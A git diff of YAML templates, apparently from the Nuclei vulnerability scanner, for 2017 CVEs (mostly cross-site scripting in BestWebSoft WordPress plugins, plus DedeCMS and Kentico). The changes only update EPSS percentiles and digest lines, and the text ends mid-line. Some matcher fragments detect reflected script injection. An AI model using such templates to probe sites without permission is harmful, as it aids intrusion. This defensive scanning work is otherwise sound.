--git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index a658a13c24..d9102e10bc 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-17731 cwe-id: CWE-89 epss-score: 0.14043 - epss-percentile: 0.95071 + epss-percentile: 0.95077 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d431fb66ab164925354afac77f3ac5418e8b453fe8db71fc10644ab2b39262b022100dc37cd8d842892d6fc5f1f147edb8d21058d04ce85fb8b063cb0abc45fadc5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d431fb66ab164925354afac77f3ac5418e8b453fe8db71fc10644ab2b39262b022100dc37cd8d842892d6fc5f1f147edb8d21058d04ce85fb8b063cb0abc45fadc5c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index b3419cf662..ab49f2ecf7 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - epss-percentile: 0.95182 + epss-percentile: 0.95187 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 490a0046304402205654f25e51e1ae7ecc646da365106eae507c91e228e9cbbcec903f6bb715dea502202ca4e0a287edb10e0539c9b6d0555d536b6ad181619a598573d5d40c2dd9dcf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205654f25e51e1ae7ecc646da365106eae507c91e228e9cbbcec903f6bb715dea502202ca4e0a287edb10e0539c9b6d0555d536b6ad181619a598573d5d40c2dd9dcf6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 8aaffd3a9a..3190f78ad2 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00072 - epss-percentile: 0.30139 + epss-percentile: 0.30149 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b6841a2402e3025d2f39e383830cf461243717383fe8a4320e2a9e6dbb012bd02207619a0285bda83bc8c5748bb31c1dec606921d993435b8d94ec1793f12b7021f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201b6841a2402e3025d2f39e383830cf461243717383fe8a4320e2a9e6dbb012bd02207619a0285bda83bc8c5748bb31c1dec606921d993435b8d94ec1793f12b7021f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 181ec601a9..e929501131 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18487 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4b0a00483046022100e130b13b5c04cedbcb2405a3dcd99372865929bb58376a1c9b049e02ee22e742022100fa3158183202c93aa2da30cbc68352702fed3d8eb10c6d3c608afabee00fb178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e130b13b5c04cedbcb2405a3dcd99372865929bb58376a1c9b049e02ee22e742022100fa3158183202c93aa2da30cbc68352702fed3d8eb10c6d3c608afabee00fb178:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index a54bbb6747..cc9ab62c58 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a0046304402207587b9dd1bd7dece642970cad241214ae8d24ea18c2e17a634bc45f1d681d1fe0220302bfcb969bf6f4be0ca8b8ea201775098e5156d36ca467b2baed659475112cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207587b9dd1bd7dece642970cad241214ae8d24ea18c2e17a634bc45f1d681d1fe0220302bfcb969bf6f4be0ca8b8ea201775098e5156d36ca467b2baed659475112cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index b10677b0d7..c0db76d812 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4b0a00483046022100e50c8b2c978dc3050f67c978cd4263da09b1ac3571d3bd62cbb7aa1ba98b2981022100bccda766abec307b80faa2af4e0c4cf0b35fae412ea7c99baf55f9e0414be618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e50c8b2c978dc3050f67c978cd4263da09b1ac3571d3bd62cbb7aa1ba98b2981022100bccda766abec307b80faa2af4e0c4cf0b35fae412ea7c99baf55f9e0414be618:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index c97601c50c..4a69b2eb88 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a00473045022100eeb0d4e74b6213e4d2f58e2a2147cad8648dd8c16e204559dee6ad81848392d0022071bb319e1ba4bf7298ac691bf803e950200733d68ef5329f09cb8cba7923718c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eeb0d4e74b6213e4d2f58e2a2147cad8648dd8c16e204559dee6ad81848392d0022071bb319e1ba4bf7298ac691bf803e950200733d68ef5329f09cb8cba7923718c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 08380be8fa..6c491023c4 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4a0a004730450220225ab98f78e293289fce8921fb5219f8130f247165d36df880ccdd0a0de82b36022100e636cd393ec04cb001830b00a2430d4eeaac0996849518801d4ce9ee2c05f7e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220225ab98f78e293289fce8921fb5219f8130f247165d36df880ccdd0a0de82b36022100e636cd393ec04cb001830b00a2430d4eeaac0996849518801d4ce9ee2c05f7e6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 8bb16e832f..e1f53a5229 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 490a0046304402201700dc5be74b30e4596b93939bad1746401e29f82a6a104a9aec778d573ce6ca0220452cda234ad20373e4becb4274caf6b02833cd2bbf3db6fb9ed0b64ba333d7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201700dc5be74b30e4596b93939bad1746401e29f82a6a104a9aec778d573ce6ca0220452cda234ad20373e4becb4274caf6b02833cd2bbf3db6fb9ed0b64ba333d7c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index ca2189a5dc..6aa90c54ca 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a0047304502210099722754b9802bf0ce58f56a286b0fc5c923a8515a1e635507a118e9811b380a02204b886fe4e484982b5d8d0e29e5ffedb4f456b3bea3460f01df3da39196a8a4da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210099722754b9802bf0ce58f56a286b0fc5c923a8515a1e635507a118e9811b380a02204b886fe4e484982b5d8d0e29e5ffedb4f456b3bea3460f01df3da39196a8a4da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 5ca8e88148..ea2cbd0391 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61159 + epss-percentile: 0.61178 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022037f2668c6b0478d9701d546e0f03547d97414e5ce71d1f7791b990a47549823d022100c0c9c32b78b0e1da3ebef6e72a10035a899cf4ec0b28f926549712d0bba453ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022037f2668c6b0478d9701d546e0f03547d97414e5ce71d1f7791b990a47549823d022100c0c9c32b78b0e1da3ebef6e72a10035a899cf4ec0b28f926549712d0bba453ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 4891441570..7a25fe1f35 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61159 + epss-percentile: 0.61178 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a004630440220164fc87f54ee83ab1b522c10fba3fdadc739b15154291a0b9c54bad3f6729dec02206cce9599aa498ee09111bfe9903162e6534146b968a11c3ca1636f509f9fd1d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220164fc87f54ee83ab1b522c10fba3fdadc739b15154291a0b9c54bad3f6729dec02206cce9599aa498ee09111bfe9903162e6534146b968a11c3ca1636f509f9fd1d8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 0c01621bde..54fb4d09d6 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61159 + epss-percentile: 0.61178 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 490a00463044022051eb7b45f48d7aa7ba5d5e88c9c538ca04a1229eef37307f3cded9a3cbf65c39022055e7833c02461d0227b04edb8315320d5c7487d3e46c9416fad5cbb972c3dff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022051eb7b45f48d7aa7ba5d5e88c9c538ca04a1229eef37307f3cded9a3cbf65c39022055e7833c02461d0227b04edb8315320d5c7487d3e46c9416fad5cbb972c3dff0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 0e20ed5155..202b568254 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52823 + epss-percentile: 0.52835 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 490a0046304402206a417af1368461aa4a52467f51639e720b2cac50f5a33a9bd553939b1be6aeed022069ab7bb59978087c07d12c20ff85aea7b9c1059d41bd983a0e4877e8138d9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206a417af1368461aa4a52467f51639e720b2cac50f5a33a9bd553939b1be6aeed022069ab7bb59978087c07d12c20ff85aea7b9c1059d41bd983a0e4877e8138d9df5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 201a53e897..0c5deb8515 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4b0a00483046022100abe41dc6153c03ba3c1d967bb3b7174b14d8fd11134c50e922a4a121a62a9643022100fb2a7a605b65051dc8baae044cff83d0240b65706cc214bb69f16381988a9360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100abe41dc6153c03ba3c1d967bb3b7174b14d8fd11134c50e922a4a121a62a9643022100fb2a7a605b65051dc8baae044cff83d0240b65706cc214bb69f16381988a9360:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index d6917a7ff6..2dd8939ebe 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022051288af34d894fe18935efcadbe932a64796fbb59ebce5705cd17c118d68f497022100dca82158f671ab4dcd1893a9823bfbba46939f706c670bf5712d7e0cc882c671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022051288af34d894fe18935efcadbe932a64796fbb59ebce5705cd17c118d68f497022100dca82158f671ab4dcd1893a9823bfbba46939f706c670bf5712d7e0cc882c671:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index ecdfbc059f..cfa25fe794 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ee67c4bf0b0ec2a4b3d33c6debcf8d4c619396fa9309d88389e2465ae50dbba1022100fc5ba89cd9a6074479237a3084b564f48109c6c11337e2f22b315f0dd58be331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ee67c4bf0b0ec2a4b3d33c6debcf8d4c619396fa9309d88389e2465ae50dbba1022100fc5ba89cd9a6074479237a3084b564f48109c6c11337e2f22b315f0dd58be331:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index c80355f62b..5a03445252 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 490a00463044022008dda146f5eb781439ac3f43ab53aeff4d808e6665043a4abffac6f32fce87850220490bb39d1773aa3d5c54336d4435ddca46962b79173ad16f10ba8838eff29827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022008dda146f5eb781439ac3f43ab53aeff4d808e6665043a4abffac6f32fce87850220490bb39d1773aa3d5c54336d4435ddca46962b79173ad16f10ba8838eff29827:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 57174228ee..bece479202 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a00473045022049aa079dd5d6cf70f0c9e3908c4cd8a80b92a7bc017b2d07652561a87c0e6068022100be61618adefad3df24b4ab557455f5fe41e4f9a2df3b5f416910a16dedae564f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022049aa079dd5d6cf70f0c9e3908c4cd8a80b92a7bc017b2d07652561a87c0e6068022100be61618adefad3df24b4ab557455f5fe41e4f9a2df3b5f416910a16dedae564f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 27d618c5d6..2229c40e54 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a004730450220732ee7d3c4471de996a3360f62a33b4ed3a623f6f70f6619ba0ebca22b8915c2022100dde9f3961a815291e373c9b7cd68ce4e582c3dcd06614c74ad8b0bc06d8e972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220732ee7d3c4471de996a3360f62a33b4ed3a623f6f70f6619ba0ebca22b8915c2022100dde9f3961a815291e373c9b7cd68ce4e582c3dcd06614c74ad8b0bc06d8e972d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index c3d96d0f91..f3c3a3213e 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d5517495b46faf349fc668192a57d583776a6ea13ffe325e014bdef30d529502022100a6c6228c5515b5696698c0b938c10d8e24dae88dd35f5aabb9b26813923af900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d5517495b46faf349fc668192a57d583776a6ea13ffe325e014bdef30d529502022100a6c6228c5515b5696698c0b938c10d8e24dae88dd35f5aabb9b26813923af900:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 32ad1331df..8440a5f96c 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4b0a00483046022100cda84c068f1514b929d9be942d09fa9ef92d24add435bac24bf68259f52ef509022100a4ac79da73ad31bc8646db884662830a97e8b800b798c45cbb59cfdf1d8070de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cda84c068f1514b929d9be942d09fa9ef92d24add435bac24bf68259f52ef509022100a4ac79da73ad31bc8646db884662830a97e8b800b798c45cbb59cfdf1d8070de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 199d99e140..de6684e6d4 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eac4b3c57c85c9da2ffcfa8c94925f58de446e01232e0cefe68fa95a705d1e2702210092f665fd2bec15fd5f2363c0874fccf7ecdc8a677fc1399e0d8623a41dbbfba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100eac4b3c57c85c9da2ffcfa8c94925f58de446e01232e0cefe68fa95a705d1e2702210092f665fd2bec15fd5f2363c0874fccf7ecdc8a677fc1399e0d8623a41dbbfba2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 339449e47d..34a443a93a 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4a0a00473045022100dfde1d7167e55bc8ef0874f838086a3e6ce051f6398dadcbaf632a906b530c1102205f8670d4be8525602e82e0a2d176e8f955588c2a8aa3568a76fa83ee1e4080c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dfde1d7167e55bc8ef0874f838086a3e6ce051f6398dadcbaf632a906b530c1102205f8670d4be8525602e82e0a2d176e8f955588c2a8aa3568a76fa83ee1e4080c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index baa8ab94a8..0ca77a84c2 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.6006 + epss-percentile: 0.60081 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a0047304502203639065935ddd90c6fe36a3904b658a6c2a5279694a668086dbe2a6e241b9936022100f2a262de41d6e9c351e01480fa1c4d347b8a9c665e275cf24fc2aea46a786e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203639065935ddd90c6fe36a3904b658a6c2a5279694a668086dbe2a6e241b9936022100f2a262de41d6e9c351e01480fa1c4d347b8a9c665e275cf24fc2aea46a786e0c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index ba1ed28af6..8d45028a5b 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4b0a00483046022100c36ee839b561365fe0f17b31ee3ddbd238260dc26b8669d945a39f2fe6a9769d022100c2fcc7e85a802baca5a161006465654d0877da9c54874b1c35a3c0642d213dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c36ee839b561365fe0f17b31ee3ddbd238260dc26b8669d945a39f2fe6a9769d022100c2fcc7e85a802baca5a161006465654d0877da9c54874b1c35a3c0642d213dda:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index e28ac23754..c78cd27fff 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 